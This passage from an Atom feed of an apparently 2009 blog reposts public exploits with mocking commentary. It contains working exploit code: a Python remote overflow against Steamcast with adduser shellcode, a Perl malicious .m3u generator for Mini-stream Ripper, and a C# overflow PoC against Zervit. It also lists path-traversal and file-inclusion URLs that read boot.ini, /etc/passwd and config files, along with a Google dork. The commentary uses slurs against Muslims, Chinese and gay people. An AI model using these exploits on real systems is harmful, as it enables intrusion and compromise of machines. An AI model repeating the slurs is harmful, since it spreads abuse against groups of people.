/&gt;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;file=open('Devil_Inside.chmprj','w')&lt;br /&gt;file.write(header1+header2)&lt;br /&gt;file.close()&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;fucking l-a-m-e. who can't jump 6 these days... try smashing a kernel bug fuckwad. Somebody decrypt his mind so he can use it!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-8084642443799121799?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/8084642443799121799/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/main-critism-does-anyone-in-arab-world.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8084642443799121799'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8084642443799121799'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/main-critism-does-anyone-in-arab-world.html' title='Abee Chm eBook Creator 2.11 (FileName) Local Stack Overflow Exploit'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-3497404713735572389</id><published>2009-04-15T19:16:00.000-07:00</published><updated>2009-04-15T19:17:31.329-07:00</updated><title type='text'>MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)</title><content type='html'>Main critism: OMG DON'T STEAL MY boot.ini!!!!ZZZZZZ&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;######################### MonGoose 2.4 (win) webserver Directory Traversal  ###################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;######By:  e.wiZz!&lt;br /&gt;&lt;br /&gt;######Site: www.balcansecurity.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Found with ServMeNot (world's sexiest fuzzer :P)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In the wild...&lt;br /&gt;&lt;br /&gt;#########################################################################################&lt;br /&gt;&lt;br /&gt;[Info]: Easy to use web server for Windows and UNIX. Mongoose provides simple and clean API&lt;br /&gt; for embedding it into existing programs. Targeting Web application developers, embedded system developers,&lt;br /&gt; and people who need to setup file sharing quickly.&lt;br /&gt;&lt;br /&gt;[Site]: http://code.google.com/p/mongoose/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[Vulnerability]:  &lt;br /&gt;&lt;br /&gt;http://[localhost]/../../../../../../boot.ini&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;This kids name is as lame as he is. Get a fucking book and read it!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-3497404713735572389?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/3497404713735572389/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/mongoose-24-webserver-directory.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/3497404713735572389'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/3497404713735572389'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/mongoose-24-webserver-directory.html' title='MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-2081197931521460688</id><published>2009-04-15T19:13:00.000-07:00</published><updated>2009-04-15T19:15:37.029-07:00</updated><title type='text'>Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]</title><content type='html'>Main critism: Is it me or is SEH not cool anymore because of these kids playing with fire?&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;#!/usr/bin/python&lt;br /&gt;#[*] Usage   : steamcast.py [victime_ip]&lt;br /&gt;#[*] Bug     : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]&lt;br /&gt;#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.        &lt;br /&gt;#[*] Tested on :    Xp sp2 (fr)&lt;br /&gt;#[*] Exploited by : His0k4&lt;br /&gt;#[*] Greetings :    All friends &amp; muslims HaCkErs (DZ),snakespc.com,secdz.com&lt;br /&gt;#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D&lt;br /&gt;#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p&lt;br /&gt;&lt;br /&gt;#Short Description : The previous exploit runs  small shellcodes only, this one is the opposite :)&lt;br /&gt;#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.&lt;br /&gt;#Other note : The shellcode will be executed when the program will be closed.&lt;br /&gt;#Another one : When you have problems with running the exploit msg me before you msg str0ke.&lt;br /&gt;&lt;br /&gt;import sys, socket&lt;br /&gt;import struct&lt;br /&gt;&lt;br /&gt;host = sys.argv[1] &lt;br /&gt;port = 8000&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;# win32_adduser -  PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com&lt;br /&gt;shellcode=(&lt;br /&gt;"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"&lt;br /&gt;"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"&lt;br /&gt;"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"&lt;br /&gt;"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"&lt;br /&gt;"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"&lt;br /&gt;"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"&lt;br /&gt;"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"&lt;br /&gt;"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"&lt;br /&gt;"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"&lt;br /&gt;"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"&lt;br /&gt;"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"&lt;br /&gt;"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"&lt;br /&gt;"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"&lt;br /&gt;"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"&lt;br /&gt;"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")&lt;br /&gt;&lt;br /&gt;shellunt=(&lt;br /&gt;"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"&lt;br /&gt;"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt&lt;br /&gt;&lt;br /&gt;#It needs a loop to works&lt;br /&gt;while 1:&lt;br /&gt; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br /&gt; s.connect((host, port))&lt;br /&gt; head =  "GET / HTTP/1.1\r\n"&lt;br /&gt; head += "Host: "+host+"\r\n"&lt;br /&gt; head += exploit+"\r\n"&lt;br /&gt; head += "\r\n\r\n"&lt;br /&gt;&lt;br /&gt; s.send(head)&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Python wasn't shit before Google bathed it in babyoil.. now its kid friendly!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-2081197931521460688?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/2081197931521460688/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/steamcast-http-request-remote-buffer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/2081197931521460688'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/2081197931521460688'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/steamcast-http-request-remote-buffer.html' title='Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-5655379375119984236</id><published>2009-04-15T19:11:00.000-07:00</published><updated>2009-04-15T19:13:05.185-07:00</updated><title type='text'>Job2C (conf.inc) Config File Disclosure Vulnerability</title><content type='html'>Main critism: Are we the other ones that get tired of seeing this muslim bullshit posted across the internet? Get a fucking life.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;                          ||          ||   | ||        &lt;br /&gt;                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, &lt;br /&gt;                  ( :   /    (_)    /           (   .  &lt;br /&gt;|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|&lt;br /&gt;|     _                   __           __       __          ______     |&lt;br /&gt;|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |&lt;br /&gt;|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |&lt;br /&gt;|  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |&lt;br /&gt;|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |&lt;br /&gt;|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |&lt;br /&gt;|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |&lt;br /&gt;|                  \ \____/ &gt;&gt; Kings of injection                      |&lt;br /&gt;|                   \/___/                                             |&lt;br /&gt;|                                                                      |&lt;br /&gt;|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;&lt;!&gt;&gt; Found by  :  Cyb3r-1sT&lt;br /&gt;&lt;br /&gt;&lt;&lt;!&gt;&gt; C0ntact : cyb3r-1st [at] hotmail.com &lt;br /&gt;                   &lt;br /&gt;&lt;&lt;!&gt;&gt; Groups : InjEctOr5 T3am &lt;br /&gt;&lt;br /&gt;=======================================================&lt;br /&gt;+++++++++++++++++++ Script information+++++++++++++++++&lt;br /&gt;=======================================================&lt;br /&gt;&lt;br /&gt;&lt;&lt;-&gt;&gt; script   :: Job2C&lt;br /&gt;&lt;br /&gt;&lt;&lt;-&gt;&gt; download :: http://www.w2b.ru/download/Job2C.zip&lt;br /&gt;=======================================================&lt;br /&gt;+++++++++++++++++++++++ Exploit +++++++++++++++++++++++&lt;br /&gt;=======================================================&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;&lt;-&gt;&gt; Exploit :: Remote Config File Disclosure&lt;br /&gt; &lt;br /&gt;                &gt;&gt;&gt; http://www.cyb3r.1st/ [path] /conf/conf.inc&lt;br /&gt;&lt;br /&gt;=======================================================&lt;br /&gt;++++++++++++++++++++++ Greetz +++++++++++++++++++++++++&lt;br /&gt;=======================================================&lt;br /&gt;&lt;br /&gt;&lt;&lt;-&gt;&gt; All freinds , all muslims , [ www.tryag.com ] , [ www.7rs.org ] , [ sec-code.com ] , hackteach, and all arabic sites&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Audit something thats worth it... but hey, your famous now, faggot!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-5655379375119984236?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/5655379375119984236/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/job2c-confinc-config-file-disclosure.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/5655379375119984236'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/5655379375119984236'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/job2c-confinc-config-file-disclosure.html' title='Job2C (conf.inc) Config File Disclosure Vulnerability'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-5314139819651274669</id><published>2009-04-15T19:08:00.000-07:00</published><updated>2009-04-15T19:10:14.779-07:00</updated><title type='text'>Zervit Webserver 0.02 Remote Buffer Overflow PoC</title><content type='html'>Main critism: Write a real fucking exploit you piece of shit. PoC's are soooo soooo lame.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;####################  Zervit Webserver 0.02  Buffer Overflow   ############################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;############### By:      e.wiZz!&lt;br /&gt;&lt;br /&gt;###############Site:   www.balcansecurity.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;############### Found with ServMeNot (world's sexiest fuzzer :P )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In the wild...&lt;br /&gt;&lt;br /&gt;########################################################################################&lt;br /&gt;&lt;br /&gt;######Vend0r site: http://www.ohloh.net/projects/mereo&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/* When requested uri isn't found,it goes to char tmp[255],&lt;br /&gt;and later it is used to output,you need 256 chars to overflow (check source "http.c") */&lt;br /&gt;&lt;br /&gt;using System;&lt;br /&gt;using System.IO;&lt;br /&gt;using System.Net;&lt;br /&gt;using System.Text;&lt;br /&gt;&lt;br /&gt;class whatsoever&lt;br /&gt;{&lt;br /&gt;    static void Main()&lt;br /&gt;    {&lt;br /&gt;        // StringBuilder sb = new StringBuilder();&lt;br /&gt;&lt;br /&gt;        //byte[] buf = new byte[8192];&lt;br /&gt;&lt;br /&gt;        Console.WriteLine("Enter site: (http://localhost)");&lt;br /&gt;        string sajt = Console.ReadLine();&lt;br /&gt;        string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";&lt;br /&gt;        HttpWebRequest request = (HttpWebRequest)&lt;br /&gt;           &lt;br /&gt;            WebRequest.Create(sajt+uribad);&lt;br /&gt;&lt;br /&gt;        HttpWebResponse response = (HttpWebResponse)&lt;br /&gt;            request.GetResponse();&lt;br /&gt;        // you shouldn't see response&lt;br /&gt;        Console.WriteLine(sb.ToString());&lt;br /&gt;    }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Why does milw0rm keep posting this shit?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-5314139819651274669?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/5314139819651274669/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/zervit-webserver-002-remote-buffer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/5314139819651274669'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/5314139819651274669'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/zervit-webserver-002-remote-buffer.html' title='Zervit Webserver 0.02 Remote Buffer Overflow PoC'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-853846859168200907</id><published>2009-04-15T15:19:00.000-07:00</published><updated>2009-04-15T19:08:05.101-07:00</updated><title type='text'>Mini-stream Ripper 3.0.1.1 .m3u Universal Stack Overflow Exploit</title><content type='html'>Main critism: this kid obviously sucks a lot of useless software chink cock.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;# Mini-stream Ripper Version 3.0.1.1 .m3u Universal Stack Overflow Exploit&lt;br /&gt;# Disoverd By Cyber-Zone&lt;br /&gt;# Exploited By Stack&lt;br /&gt;my $Header = "#EXTM3U\n";&lt;br /&gt;my $shellcode =&lt;br /&gt;"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".&lt;br /&gt;"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".&lt;br /&gt;"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".&lt;br /&gt;"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".&lt;br /&gt;"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".&lt;br /&gt;"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".&lt;br /&gt;"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".&lt;br /&gt;"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".&lt;br /&gt;"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".&lt;br /&gt;"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".&lt;br /&gt;"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".&lt;br /&gt;"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".&lt;br /&gt;"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".&lt;br /&gt;"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".&lt;br /&gt;"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".&lt;br /&gt;"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".&lt;br /&gt;"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".&lt;br /&gt;"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".&lt;br /&gt;"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".&lt;br /&gt;"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".&lt;br /&gt;"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".&lt;br /&gt;"\x4e\x46\x43\x36\x42\x50\x5a";&lt;br /&gt;my $ex="http://"."A" x 26117;&lt;br /&gt;my $ret="\x1D\xE3\x07\x02"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this &gt;&gt;&lt;br /&gt;   # "\x5D\x38\x82\x7C";&lt;br /&gt;my $nop="\x90" x 20;&lt;br /&gt;open(MYFILE,'&gt;&gt;Mini-stream-Ripper.m3u');&lt;br /&gt;print MYFILE $Header.$ex.$ret.$nop.$shellcode;&lt;br /&gt;close(MYFILE);&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Stack is a super lame name. Read "Win32 internals for Dumbasses"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-853846859168200907?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/853846859168200907/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/mini-stream-ripper-3011-m3u-universal.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/853846859168200907'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/853846859168200907'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/mini-stream-ripper-3011-m3u-universal.html' title='Mini-stream Ripper 3.0.1.1 .m3u Universal Stack Overflow Exploit'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-916268637688577813</id><published>2009-04-15T15:13:00.000-07:00</published><updated>2009-04-15T19:07:28.661-07:00</updated><title type='text'>FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability</title><content type='html'>Main critism (I wish I had the patience to type more): not even an exploit&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;            =-=-local file include-=-=&lt;br /&gt;&lt;br /&gt;-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=&lt;br /&gt;script::FreeWebshop.org 2..2.9_R2&lt;br /&gt;-------------------------------------------------&lt;br /&gt;Author: ahmadbady&lt;br /&gt;&lt;br /&gt;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-&lt;br /&gt;download from:http://chaozz.deepunder.dk/released/freewebshop/FreeWebshop.org2.2.9_R2.zip&lt;br /&gt;&lt;br /&gt;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-==-=-=&lt;br /&gt;vul: /includes/startmodules.inc.php line 31;&lt;br /&gt;&lt;br /&gt;include ("./".$lang_file);&lt;br /&gt;&lt;br /&gt;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=&lt;br /&gt;xpl:&lt;br /&gt;/path/includes/startmodules.inc.php?lang_file=.../../../../etc/passwd&lt;br /&gt;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=-=-=-&lt;br /&gt;&lt;br /&gt;dork:&lt;br /&gt;"FreeWebshop.org | This is the Footer | ©2008-2009"&lt;br /&gt;"FreeWebshop.org | This is the Footer |"&lt;br /&gt;&lt;br /&gt;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;By Ahmedmacabelvi wannabe muslim fuckhead.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-916268637688577813?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/916268637688577813/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/freewebshoporg-229-rc2-langfile-local.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/916268637688577813'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/916268637688577813'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/freewebshoporg-229-rc2-langfile-local.html' title='FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry></feed>
